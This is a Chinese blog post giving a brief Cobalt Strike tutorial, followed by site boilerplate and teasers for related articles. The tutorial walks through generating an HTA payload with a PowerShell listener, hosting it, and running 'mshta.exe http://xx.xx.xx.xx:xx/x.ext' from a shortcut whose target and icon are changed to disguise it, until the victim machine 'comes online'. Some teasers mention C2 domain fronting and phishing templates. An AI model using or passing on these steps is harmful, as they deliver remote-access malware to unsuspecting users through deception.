步骤:
1、生成:Attacks -> Packages -> Html Application
2、上传:Attacks——>Web Drive by——>Host file
3、执行:C:\Windows\System32\mshta.exe http://xx.xx.xx.xx:xx/x.ext
4、伪装:
-创建快捷方式
-生成HTA并上传
-属性更改目标执行
-属性更改图标伪装
这里会用到windows中的mshta,用于执行hta文件
mshta.exe是微软Windows操作系统相关程序,英文全称Microsoft HTML Application,可翻译为微软超文本标记语言应用,用于执行.HTA文件
下面进行演示
打开已经配置好的CS
1、生成:Attacks -> Packages -> Html Application
选择设置的监听器-power shell
生成evil.hta
2、上传:Attacks——>Web Drive by——>Host file
复制生成的利用文件网址
3.创建快捷方式
4.执行:C:\Windows\System32\mshta.exe http://xx.xx.xx.xx:xx/x.ext
5.伪装(自行拓展,不做演示)
-创建快捷方式
-生成HTA并上传
-属性更改目标执行
-属性更改图标伪装(自行扩展)
点击快捷方式-快捷方式成功上线
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/358224.shtml
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!相关文章
基本算法研究1-冒泡排序算法测试
基本算法研究1-冒泡排序算法测试 1、经典冒泡排序法基本原理 先看一个动态图,感觉比较形象: 冒泡排序(Bubble Sort)是一种简单的排序算法。默认是从小到大排序,即把最大的数据排在最后,相当于每次把最大数据…
Java中的低延迟FIX引擎
总览 Chronicle FIX是我们的Low Latency FIX引擎和Java数据库。 是什么使它与众不同? 是为Java中的超低GC *设计的。 支持字符串和日期时间的方式可以最大程度地减少垃圾和开销。 可自定义为仅包含您期望的字段。 使用通常在二进制解析器和生成器中使用的优化&…
钓鱼文件名反转office远程模板
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无关
0x01 件…
Cobalt Strike特征修改
在红蓝对抗以及hvv等等情况下,我们都会用到 Cobalt Strike,那么它也是安全公司重点关注的对象,跟msf类似,但CS操作相对比MSF使用简单,同时也有一个强大的插件库。那么,这么红的工具,特征方面安全…
工厂模式与抽象工厂模式
1、工厂模式:定义了一组创建对象的接口,但是由子类决定要实例化的类是哪一个。工厂方法把类的实例化推迟到子类中。 现在考虑有PizzaStore有一些子类(加盟店),他们有可能对pizza的做法进行一些改良,即creat…
CS通过(CDN+证书)powershell上线详细版
0x00 简介
这个应该叫做域前置技术:
大致图示: 攻击流量通过CDN节点将流量转发到真实的C2服务器CDN节点ip通过识别请求的Host头进行流量转可以有效的躲避一些安全设备,也有这一定的反溯源功能,因为流量都去了CDN上
之前看了一些…
红蓝对抗之流量加密(Openssl加密传输、MSF流量加密、CS修改profile进行流量加密)
本篇文章转载于:https://blog.csdn.net/q20010619/article/details/122006433?utm_mediumdistribute.pc_relevant.none-task-blog-2defaultbaidujs_utm_term~default-1-122006433-blog-122810834.pc_relevant_default&spm1001.2101.3001.4242.2&utm_relevant_index4 文…
有var d = new Date(‘20xx-m-09‘),可以设置为m+1月份的操作是?
setMonth(n),这里是0-11分别对应1-12月
d.setDate(n);
n表示一个月中的一天的一个数值(1 ~ 31):
0 为上一个月的最后一天 -1 为上一个月最后一天之前的一天 如果当月有 31 天: 32 为下个月的第一天 如果当月有 30 天:
32 为下一个月的第二…
深入理解Java引用类型
深入理解Java引用类型 在Java中类型可分为两大类:值类型与引用类型。值类型就是基本数据类型(如int ,double 等),而引用类型,是指除了基本的变量类型之外的所有类型(如通过 class 定义的类型)。所有的类型在…
值得一谈的鸿蒙2.0,程序员们拿起你们手中的编译器撸一下hello world
一款“面向未来”、面向全场景(移动办公、运动健康、社交通信、媒体娱乐等)的分布式操作系统 。现已开源,名为OpenHarmony。
2019年8月9日,华为在HDC开发者大会上正式发布鸿蒙系统。
2020年9月10日,华为在HDC开发者大会上如约发布鸿蒙 2.0,并面向应用开发者发布Beta版本…
GitHack使用方法
ctf小白刚下载这个,不知道怎么用。现在会用啦就记录一下~ 下载地址:https://github.com/lijiejie/GitHack 下载下来后,通过cmd使用,如下图所示: 总结(命令): GitHack.py http://XXXX…
值得一谈的鸿蒙2.0,赶紧撸一下hello world
一款“面向未来”、面向全场景(移动办公、运动健康、社交通信、媒体娱乐等)的分布式操作系统 。现已开源,名为OpenHarmony。2019年8月9日,华为在HDC开发者大会上正式发布鸿蒙系统。2020年9月10日,华为在HDC开发者大会上…
【Jenkins】未授权访问漏洞
一、漏洞介绍
1 ) Jenkins介绍
Jenkins是一个基于Java开发的开源项目,可在Tomcat等流行的servlet容器中运行,也可以独立运行,其功能如下:
用于持续性、自动的构建/测试软件项目监控或跑一些定时任务监控外部调用执行的工作
2 …
解决谷歌浏览器F12打不开调试页面的问题。
最近应用着急上线,需要批量测试,发现F12不好使啦。
解决办法:
1.找到谷歌浏览器:设置-扩展程序-开发者模式。关闭。 2.刷新浏览器或者重启浏览器后,打开需要调试的页面,鼠标点一下地址栏,按F1…
还有另一个报告生成器?
如果您具有业务应用程序开发的经验,那么很可能会遇到要求该应用程序具有灵活的报告机制的需求。 我工作的公司主要专注于开发业务解决方案,而报告是必不可少的,的确,它必须包含我们开发的所有企业系统的方面。 为了在我们的系统中…
ARL资产侦察灯塔系统搭建及使用
ARL资产侦察灯塔系统搭建及使用
ARL(Asset Reconnaissance Lighthouse)资产侦查灯塔旨在快速发现并整理企业外网资产并为资产构建基础数据库,无需登录凭证或特殊访问即可主动发现并识别资产,让甲方安全团队或者渗透测试人员快速寻…
window电脑关闭自动更新的方法,妈妈再也不用担心我开机等电脑啦
公司的新电脑,每次关机开机都会更新,今天更新了3次,每次半小时,我忍不了,赶紧关闭自动更新。
1.winR打开面板输入services.msc,然后回车。 2.找到windows Update,右键找到 属性。 3.把启动类型改为“禁用”…
我是如何解决电脑连接WiFi提示无线适配器或访问点有问题
今天国庆后第一天上班,打开电脑一直连接不上我手机的热点,提示无线适配器或访问点有问题。可能是由于重启电脑自动更新系统的缘故,关闭电脑自动更新的办法请参考我的上一篇文章:window电脑关闭自动更新的方法
不说废话࿰…